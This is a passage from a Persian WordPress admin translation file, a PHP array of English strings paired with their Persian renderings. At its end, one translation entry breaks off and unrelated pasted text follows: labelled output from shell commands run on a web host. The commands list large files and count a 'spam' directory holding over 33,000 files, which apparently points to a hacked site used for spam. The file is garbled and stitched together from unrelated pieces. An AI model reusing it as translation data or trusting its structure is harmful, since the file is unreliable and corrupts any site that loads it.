بررسیِ خودتان را بنویسید!','Reviews'=>'بررسی‌ها','You are using a development version of WordPress. These feature plugins are also under development. Learn more.'=>'شما از نگارش مخصوص توسعه‌دهندگان استفاده می‌کنید. این افزونه‌ها هم در حال توسعه هستند. بیشتر بدانید.','Thumbnail Settings Help'=>'راهنمای تنظیمات تصویر شاخص','selection height'=>'بلندای انتخاب‌شده','selection width'=>'پهنای انتخاب‌شده','crop ratio height'=>'بلندای نسبت برش','crop ratio width'=>'پهنای نسبت برش','Image Crop Help'=>'راهنمای برش تصویر','scale height'=>'بلندای مقیاس','New dimensions:'=>'ابعاد تازه:','Scale Image Help'=>'راهنمای مقیاس تصویر','Single Page'=>'برگهٔ یکتا','Singular Template'=>'تک‌رده','Date Template'=>'قالب تاریخ','Taxonomy Template'=>'قالب رده','Dismiss the browser warning panel'=>'نادیده گرفتن کادر هشدار مرورگر','View more comments'=>'دیدن دیدگاه‌های بیشتر','dashboard%1$s on %2$s %3$s'=>'%1$s در %2$s %3$s','View this comment'=>'مشاهده این دیدگاه','Another update is currently in progress.'=>'به‌روزرسانی دیگری در جریان است.','Update progress'=>'پردازش به‌روزرسانی','View “%s” archive'=>'دیدن بایگانی “%s”','Delete “%s”'=>'پاک کردن “%s”','Quick edit “%s” inline'=>'ویرایش سریع “%s” به صورت توکار','Search for plugins in the WordPress Plugin Directory.'=>'جستجوی افزونه در مخزن افزونه‌های وردپرس.','Restore “%s” from the Trash'=>'بازیابی “%s” از زباله‌دان','Delete “%s” permanently'=>'پاک کردن‌ همیشگی “%s”','Move “%s” to the Trash'=>'انتقال “%s” به زباله‌دان','Attach “%s” to existing content'=>'پیوست کردن “%s” به محتوای موجود','Detach from “%s”'=>'جداکردن از “%s”','attachment filterTrash'=>'زباله‌دان','Quick edit this comment inline'=>'ویرایش سریع دیدگاه به صورت توکار','Edit this comment'=>'ویرایش این دیدگاه','Restore this comment from the spam'=>'بازیانی این دیدگاه از جفنگ‌ها','user autocomplete result%1$s (%2$s)'=>'%1$s (%2$s)','The %s importer is invalid or is not installed.'=>'درون‌ریز %s معتبر نیست یا نصب نشده.','comment statusPending'=>'در انتظار','Suggested height is %s.'=>'بلندای پیشنهادی %s است.','Suggested width is %s.'=>'پهنای پیشنهادی %s است.','Images should be at least %s tall.'=>'تصاویر باید دست‌کم دارای بلندای %s باشند.','%d pixels'=>'%d پیکسل','Images should be at least %s wide.'=>'تصاویر باید دست‌کم دارای پهنای %s باشند.','Send the new user an email about their account'=>'ارسال ایمیل مربوط به جزئیات حساب به کاربران جدید','Send User Notification'=>'فرستادن آگاه‌ساز به کاربر','menu location(Currently set to: %s)'=>'(تنظیم کنونی: %s)','Version %s addressed one security issue.'=>'نگارش %s یک مشکل امنیتی را برطرف کرده است.','https://gravatar.com/'=>'https://gravatar.com/','Profile Picture'=>'تصویر شناسنامه','Maintenance and Security Releases'=>'نگارش‌های تعمیراتی و امنیتی','Security Releases'=>'انتشارهای امنیتی','Maintenance Releases'=>'نگارش‌های تعمیراتی','Plain'=>'ساده','WordPress offers you the ability to create a custom URL structure for your permalinks and archives. Custom URL structures can improve the aesthetics, usability, and forward-compatibility of your links. A number of tags are available, and here are some examples to get you started.'=>'وردپرس به شما این قابلیت را می‌دهد که ساختار دلخواهی برای پیوندهای یکتا و صفحات بایگانی ایجاد کنید. ساختار نشانی دلخواه می‌تواند زیبایی‌شناسی، کاربردپذیری و سازگاری با آینده را در پیوندهای شما بهبود ببخشد. برخی از برچسب‌ها در دسترس شما هستند، و اینجا برای شروع نمونه‌هایی را مشاهده می‌کنید.','Permalinks can contain useful information, such as the post date, title, or other elements. You can choose from any of the suggested permalink formats, or you can craft your own if you select Custom Structure.'=>'پیوندهای یکتا می‌توانند شامل اطلاعات مفیدی مانند تاریخ ارسال نوشته، عنوان نوشتهو یا موارد دیگر دیگر باشند. شما می‌توانید هر کدام از ساختارهای پیشنهاد شده را انتخاب کنید یا اینکه مدل مورد نظر خود را با انتخاب گزینه ساختار دل خواه ایجاد کنید.','You can create the %s file manually and paste the following text into it.'=>'شما می‌توانید %s پرونده را به صورت دستی ساخته و متن زیر را در آن بنویسید.','You should be able to get this info from your web host, if %s does not work.'=>'اگر %s کار نکرد، باید این اطلاعات را از سرویس میزبانی خود بگیرید.','If for any reason this automatic file creation does not work, do not worry. All this does is fill in the database information to a configuration file. You may also simply open %1$s in a text editor, fill in your information, and save it as %2$s.'=>'اگر به هر دلیلی ایجاد خودکار پرونده کار نکرد، نگران نباشید. همه این اطلاعات در پایگاه‌داده برای ساختن پرونده پیکربندی ذخیره شده‌اند. همچنین می‌توانید %1$s را در یک ویرایشگر متن باز کنید، اطلاعات خود را وارد کرده و آن را با نام %2$s ذخیره کنید.','Default is %s'=>'%s پیش‌فرض است','The language pack is missing either the %1$s, %2$s, or %3$s files.'=>'این بسته زبان پرونده‌های %1$s، %2$s یا %3$s را ندارد.','The %s stylesheet does not contain a valid theme header.'=>'شیوه‌نامهٔ %s حاوی سربرگ معتبری برای پوسته نیست.','The theme is missing the %s stylesheet.'=>'پوسته، پروندهٔ استایل %s را کم دارد.','If you have marked themes as favorites on WordPress.org, you can browse them here.'=>'اگر در WordPress.org پوسته‌هایی را به علاقه‌مندی‌هایتان افزوده باشید، اینجا می‌توانید پیدایشان کنید.','themesFavorites'=>'علاقه‌مندی‌ها','Database repair results'=>'نتایج تعمیر پایگاه‌داده','Allow automatic database repair'=>'اجازه تعمیر خودکار پایگاه‌داده','Successful database connection'=>'برقراری ارتباط موفق با پایگاه‌داده','Set up your database connection'=>'راه‌اندازی اتصال پایگاه‌دادهٔ شما','Before getting started'=>'پیش از آغاز','WordPress database repair'=>'تعمیر پایگاه‌داده وردپرس','Check secret keys'=>'بررسی کلید‌های مخفی','%s has been updated.'=>'%s به‌روز شده است.','The Walker class named %s does not exist.'=>'Walker class با نام %s موجود نیست.','Requires %1$s in %2$s file.'=>'نیازمند %1$s در پروندهٔ %2$s.','Standard time begins on: %s.'=>'آغاز ساعت استاندارد: %s.','Daylight saving time begins on: %s.'=>'آغاز ساعت تابستانی: %s.','You are about to delete %s.'=>'شما می‌خواهید %s را پاک کنید.','Files in the %s directory are executed automatically.'=>'پرونده‌های درون پوشهٔ %s به صورت خودکار اجرا می‌شوند.','This will clear all items from the inactive widgets list. You will not be able to restore any customizations.'=>'این گزینه فهرست تمام ابزارک‌های غیر فعال را پاک می‌کند. شما قادر نخواهید بود هیچ‌کدام از شخصی‌سازی‌ها را بازیابی نمایید.','Clear Inactive Widgets'=>'پاک‌سازی ابزارک‌های غیر فعال','One of the selected users is not a member of this site.'=>'یکی از کاربران انتخاب شده عضو این سایت نیست.','Users list'=>'فهرست کاربران','Users list navigation'=>'راهبری فهرست کاربران','Filter users list'=>'پالایش فهرست کاربران','Media items list'=>'فهرست موارد رسانه‌ای','Media items list navigation'=>'راهبری فهرست موارد رسانه‌ای','Filter media items list'=>'پالایش فهرست موارد رسانه‌ای','Install Parent Theme'=>'نصب پوستهٔ مادر','Themes list'=>'فهرست پوسته‌ها','Filter themes list'=>'پالایش فهرست پوسته‌ها','All selected plugins are up to date.'=>'همه افزونه‌های انتخاب شده، به‌روزهستند.','Plugins list'=>'فهرست افزونه‌ها','Plugins list navigation'=>'راهبری فهرست افزونه‌ها','Filter plugins list'=>'پالایش فهرست افزونه‌ها','Browsing %s (inactive)'=>'مرور %s (غیر فعال)','Editing %s (inactive)'=>'ویرایش %s (غیر فعال)','Browsing %s (active)'=>'مرور %s (فعال)','Editing %s (active)'=>'ویرایش %s (فعال)','Local time is %s.'=>'زمان محلی %s است.','Links list'=>'فهرست پیوندها','Get Version %s'=>'دریافت نگارش %s','Toggle panel: %s'=>'تغییر وضعیت پنل: %s','Saving revision…'=>'ذخیرهٔ رونوشت…','Edit permalink'=>'ویرایش پیوندیکتا','The %1$s plugin header is deprecated. Use %2$s instead.'=>'سربرگ افزونهٔ %1$s منسوخ شده است. به جای آن از %2$s استفاده نمایید. ','Warning'=>'اخطار','Warning:'=>'هشدار:','Once you hit “Confirm Deletion”, these users will be permanently removed.'=>'وقتی روی “پاک شود” کلیک کنید، این کاربرها برای همیشه حذف خواهند شد.','Once you hit “Confirm Deletion”, the user will be permanently removed.'=>'وقتی روی “پاک شود” کلیک کنید، کاربر برای همیشه حذف خواهد شد.','User has no sites or content and will be deleted.'=>'کاربر هیچ سایت یا محتوایی ندارد و پاک خواهد شد.','Site: %s'=>'سایت: %s','Select a user'=>'انتخاب یک کاربر','What should be done with content owned by %s?'=>'با محتوای تولیدشده توسط %s چه کاری باید انجام شود؟ ','Warning! User cannot be deleted. The user %s is a network administrator.'=>'هشدار! کاربر نمی‌تواند پاک شود. کاربر %s یکی از مدیران شبکه است. ','Warning! User %s cannot be deleted.'=>'اخطار! کاربر %s نمی‌تواند پاک شود.','You have chosen to delete the following users from all networks and sites.'=>'شما پاک کردن این کاربران از تمام شبکه‌ها و سایت‌ها را انتخاب کرده‌اید. ','You have chosen to delete the user from all networks and sites.'=>'شما پاک کردن کاربر از تمام شبکه‌ها و سایت‌ها را انتخاب کرده‌اید.','Invalid image URL.'=>'نشانی تصویر نامعتبر.','Theme Header'=>'سربرگ پوسته','Theme Footer'=>'پابرگ پوسته','M jS Y'=>'jS M Y','From %1$s %2$s'=>'از %1$s %2$s','View all drafts'=>'دیدن همه پیش‌نویس‌ها','no user rolesNone'=>'هیچکدام','No role'=>'بدون نقش','An error occurred while updating %1$s: %2$s'=>'هنگام به‌روز‌رسانی %1$s یک خطا رخ داده است: %2$s','View mode'=>'حالت نمایش','%s column'=>'%s ستون','Additional settings'=>'تنظیمات افزوده','Items list'=>'فهرست موارد','Items list navigation'=>'راهبری فهرست موارد','Filter items list'=>'پالایش فهرست موارد','Network Only'=>'فقط شبکه','Network Active'=>'فعال در شبکه','No pending comments'=>'دیدگاهی در انتظار بررسی نیست','Failed to initialize a SFTP subsystem session with the SSH2 Server %s'=>'مقدار‌دهی اولیه نشست زیر‌سیستم با SSH2 سرور %s با شکست روبرو شد.','column nameSubmitted on'=>'ارسال شده در','commentsTrash (%s)'=>'زباله‌دان (%s)','commentsSpam (%s)'=>'جفنگ (%s)','commentsApproved (%s)'=>'تاییدشده (%s)','commentsPending (%s)'=>'در انتظار تایید (%s)','commentsAll (%s)'=>'همه (%s)','User %s added'=>'کاربر %s افزوده شد','End date:'=>'تاریخ پایان:','Content to export'=>'محتوا برای برون‌بری','You can view posts in a simple title list or with an excerpt using the Screen Options tab.'=>'با استفاده از برگهٔ تنظیمات صفحه می‌توانید نوشته‌ها را به صورت فهرست ساده‌ای از عنوان‌ها یا به همراه چکیده ببینید.','Submitted on: %s'=>'فرستاده شده در: %s','commentPermalink:'=>'پیوند یکتا:','Page draft updated.'=>'پیش‌نویس برگه به‌روزرسانی شد.','Page scheduled for: %s.'=>'برگه زمان‌بندی‌شده برای: %s.','Page submitted.'=>'صفحه فرستاده شد.','Post draft updated.'=>'پیش‌نویس نوشته به‌روزرسانی شد.','Post scheduled for: %s.'=>'نوشته زمان‌بندی‌شده برای: %s.','Post submitted.'=>'نوشته فرستاده شد.','View page'=>'دیدن برگه','Preview page'=>'پیش‌نمایش صفحه','Preview post'=>'پیش‌نمایش نوشته','Comments list'=>'فهرست دیدگاه‌ها','Comments list navigation'=>'راهبری فهرست دیدگاه‌ها','Filter comments list'=>'پالایش فهرست دیدگاه‌ها','In the Submitted on column, the date and time the comment was left on your site appears. Clicking on the date/time link will take you to that comment on your live site.'=>'زمان و تاریخ دیدگاه در ظاهر سایت شما در ستون ارسال‌شده در باقی خواهد ماند. کلیک روی پیوند تاریخ/زمان شما را به آن دیدگاه در سایتتان خواهد برد.','In the Comment column, hovering over any comment gives you options to approve, reply (and approve), quick edit, edit, spam mark, or trash that comment.'=>'باقی ماندن بر روی هر دیدگاه در ستون دیدگاه، به شما گزینه‌هایی برای پذیرش، پاسخ (و پذیرش)، ویرایش سریع، ویرایش، جفنگ‌نشان کردن و یا به زباله‌دان انداختن آن دیدگاه می‌دهد.','Comments (%s)'=>'دیدگاه‌ها (%s)','Comments (%1$s) on “%2$s”'=>'دیدگاه‌ها (%1$s) در “%2$s”','Sorry, you are not allowed to modify themes.'=>'با عرض پوزش، شما مجاز به تغییر دادن پوسته‌ها نیستید.','The active theme does not support a flexible sized header image.'=>'پوستهٔ کنونی از تصویر سربرگی با اندازهٔ منعطف پشتیبانی نمی‌نماید. ','You are using the auto-generated password for your account. Would you like to change it?'=>'شما از رمزی که به‌طور خودکار برای حساب‌کاربری‌تان ایجاد شده استفاده می‌کنید. آیا مایلید آن را تغییر دهید؟','You have specified this user for removal:'=>'شما این کاربر رای برای پاک کردن مشخص کرده‌اید:','Log %s out of all locations.'=>'بیرون رفتن %s از همه دستگاه‌ها.','Did you lose your phone or leave your account logged in at a public computer? You can log out everywhere else, and stay logged in here.'=>'تلفن همراه خود را گم کرده‌اید یا در یک رایانه عمومی حساب کاربری خود را باز گذاشته‌اید؟ می‌توانید از هر دستگاه دیگری بیرون بروید و در همین دستگاه وارد شده بمانید.','Log Out Everywhere Else'=>'بیرون رفتن از هر دستگاه دیگر‌','Sessions'=>'نشست‌ها','Cancel password change'=>'لغو تغییر رمز','Generate password'=>'ساختن رمز','Account Management'=>'مدیریت حساب','You will need this password to log in. Please store it in a secure location.'=>'به این رمز برای ورود نیاز خواهید داشت. لطفاً آن را در مکان امنی نگهداری کنید.','No approved comments'=>'دیدگاه تاییدشده‌ای وجود ندارد','%s pending comment'=>'%s دیدگاه در انتظار تایید','%s approved comment'=>'%s نظر تاییدشده','Image could not be processed.'=>'تصویر نمی‌تواند پردازش شود.','Confirm Password'=>'تایید رمز','Remove Site Icon'=>'حذف آیکون سایت','While you are editing your %1$s file, take a moment to make sure you have all 8 keys and that they are unique. You can generate these using the WordPress.org secret key service.'=>'هنگام ویرایش پروندهٔ %1$s، مطمئن شوید که همهٔ ۸ کلید را در اختیار دارید و آن‌ها یکتا هستند. می‌توانید این کلیدها با استفاده از خدمات تولید کلیدهای خصوصی وردپرس بسازید.','Set as Site Icon'=>'تنظیم آیکون سایت','Choose a Site Icon'=>'انتخاب یک آیکون سایت','Show more details'=>'نمایش جزئیات بیشتر','Your theme supports %s menu. Select which menu appears in each location.'=>'پوستهٔ شما از %s فهرست پشیبانی می‌کند. انتخاب کنید که هر فهرست کجا نمایش داده شود.','%s post by this author'=>'%s نوشته از این نویسنده','Live Preview “%s”'=>'پیش‌نمایش زنده “%s”','last page'=>'برگهٔ آخر','first page'=>'برگه نخست ','In response to: %s'=>'در پاسخ به: %s','Date and time'=>'تاریخ و زمان','You can also embed media from many popular websites including Twitter, YouTube, Flickr and others by pasting the media URL on its own line into the content of your post/page. Learn more about embeds.'=>'همچنین می‌توانید رسانه را از سایت‌های معروفی شامل توییتر، یوتیوب، فلیکر و... با استفاده از قرار دادن نشانی رسانه مربوطه در خط خودش در متن نوشته/برگه، جاسازی کنید. دربارهٔ جاسازی‌ها بیشتر بدانید.','Documentation on Custom Background'=>'مستندات دربارهٔ پس‌زمینه دلخواه','Documentation on Link Categories'=>'مستندات دربارهٔ دسته‌های پیوند','Documentation on Creating Links'=>'مستندات دربارهٔ ساخت پیوندها','Documentation on Managing Links'=>'مستندات درباره مدیریت پیوندها','Documentation on Custom Header'=>'مستندات دربارهٔ سربرگ دلخواه','Documentation on My Sites'=>'مستندات دربارهٔ سایت‌های من','The theme you are currently using is not widget-aware, meaning that it has no sidebars that you are able to change. For information on making your theme widget-aware, please follow these instructions.'=>'پوستهٔ کنونی شما از ابزارک پشتیبانی نمی‌کند، به این معنی که نمی‌توانید نوار کناری پوستهٔ خود را ویرایش کنید. برای دریافت اطلاعات در مورد ایجاد قابلیت ابزارک در پوسته، لطفا این دستورالعمل را دنبال کنید.','When you publish a new post, WordPress automatically notifies the following site update services. For more about this, see the Update Services documentation article. Separate multiple service URLs with line breaks.'=>'هنگامی که نوشتهٔ تازه‌ای منتشر می‌کنید، وردپرس بصورت خودکار سرویس‌های به‌روزرسانی سایت زیر را آگاه می‌کند. برای اطلاعات بیشتر در این مورد، سرویس‌های به‌روزرسانی را در مستندات مشاهده نمایید. چند نشانی‌ URL سرویس‌ها را، در خطوط جداگانه قرار دهید.','The character encoding of your site (UTF-8 is recommended)'=>'نوع نویسه‌های سایت شما (UTF-8 پیشنهاد می‌شود)','example: www.wordpress.org'=>'نمونه: www.wordpress.org','The search for installed themes will search for terms in their name, description, author, or tag.'=>'جستجوی پوسته‌های نصب شده، در نام پوسته‌ها، توضیح، طراح، یا برچسب‌های آن‌ها جستجو می‌کند.','Alternately, you can browse the themes that are Popular or Latest. When you find a theme you like, you can preview it or install it.'=>'همچنین، می‌توانید پوسته‌های محبوب، یا تازه را مرور کنید. وقتی پوستهٔ مورد پسندتان را پیدا کردید، می‌توانید پیش‌نمایش آن را ببینید یا آن را نصب کنید.','You can Search for themes by keyword, author, or tag, or can get more specific and search by criteria listed in the feature filter.'=>'می‌توانید با استفاده از کلیدواژه، طراح، یا برچسب پوسته‌ها را جستجو نمایید، یا می‌توانید دقیق‌تر باشید و بر اساس ملاک‌هایی که در صافی امکانات فهرست شده‌اند جستجو نمایید.','Number of Themes found: %d'=>'تعداد پوسته‌های یافت شده: %d','Custom time format:'=>'ساختار زمان سفارشی:','enter a custom time format in the following field'=>'یک ساختار زمان سفارشی در کادر زیر وارد نمایید','Custom date format:'=>'ساختار تاریخ سفارشی:','enter a custom date format in the following field'=>'یک ساختار تاریخ سفارشی در کادر زیر وارد نمایید','Plugins updated successfully.'=>'افزونه‌ها با موفقیت به‌روزرسانی شدند.','Active plugin installations%s+ Million'=>'%s+ میلیون','XML Error: %1$s at line %2$s'=>'XML Error: %1$s at line %2$s','Main menu'=>'فهرست اصلی','Enter the location on the server where the public and private keys are located. If a passphrase is needed, enter that in the password field above.'=>'نشانی محلی از سرویس‌دهنده که کلیدهای عمومی و خصوصی در آن قرار دارد را وارد نمایید. اگر به رمز عبور نیاز است، رمز عبور را در کادر بالا وارد نمایید.','%s user deleted.'=>'%s کاربر پاک شد.','What should be done with content owned by these users?'=>'با نوشته‌های این کاربران چه کنیم؟','You have specified these users for deletion:'=>'شما این کاربران را برای پاک کردن مشخص کرده‌اید:','You are about to remove the following plugins:'=>'شما در حال پاک کردن این افزونه‌ها هستید:','These plugins may be active on other sites in the network.'=>'این افزونه‌ها ممکن است در سایت‌های دیگر این شبکه فعال باشند.','Delete Plugins'=>'پاک کردن افزونه‌ها','1 page not updated, somebody is editing it.'=>'۱ برگه به‌روز نشد، فردی در حال ویرایش آن است.','1 post not updated, somebody is editing it.'=>'۱ نوشته به‌روز نشد، کسی در حال ویرایش آن است.','You can log out of other devices, such as your phone or a public computer, by clicking the Log Out Everywhere Else button.'=>'با زدن دکمه بیرون رفتن از همه نشست‌های دیگر، می‌توانید از بقیه دستگاه‌ها، مانند تلفن همراه یا رایانه عمومی بیرون بروید.','New translations are available.'=>'ترجمه‌های تازه در دسترس است.','This theme has not been rated yet.'=>'هنوز امتیازی به این پوسته داده نشده است.','timezone date formatY-m-d H:i:s'=>'Y-m-d H:i:s','To add a custom link, expand the Custom Links section, enter a URL and link text, and click Add to Menu'=>'برای اضافه کردن یک پیوند سفارشی، بخش پیوندهای سفارشی را باز کنید، نشانی پیوند و متن نمایش آن را وارد و روی افزودن به فهرست کلیک نمایید.','Howdy ###USERNAME###, ) ===FIND_LARGE_FILES=== Array ( [cmd] => find /home/filetir/public_html -type f -size +50M 2>/dev/null -exec ls -lh {} \; [code] => 0 [out] => -rw-r--r-- 1 filetir filetir 292M Jul 1 16:06 /home/filetir/public_html/wp-content.zip ) ===SPAM_DIR_COUNT=== Array ( [cmd] => ls /home/filetir/public_html/hypercredit/spam | head -20; echo "---"; find /home/filetir/public_html/hypercredit/spam -maxdepth 1 -type d | wc -l; find /home/filetir/public_html/hypercredit/spam -maxdepth 1 -type f | wc -l [code] => 0 [out] => 0000.txt 10.txt 1111.txt 12.txt 13.txt 15.txt 16.txt 17.txt 1782686369.txt 18.txt 19.txt 1A.txt 1B.txt 1C.txt 1D.txt 1F.txt 1H.txt 1I.txt 1J.txt 1M.txt --- 1 33432 ) ===END===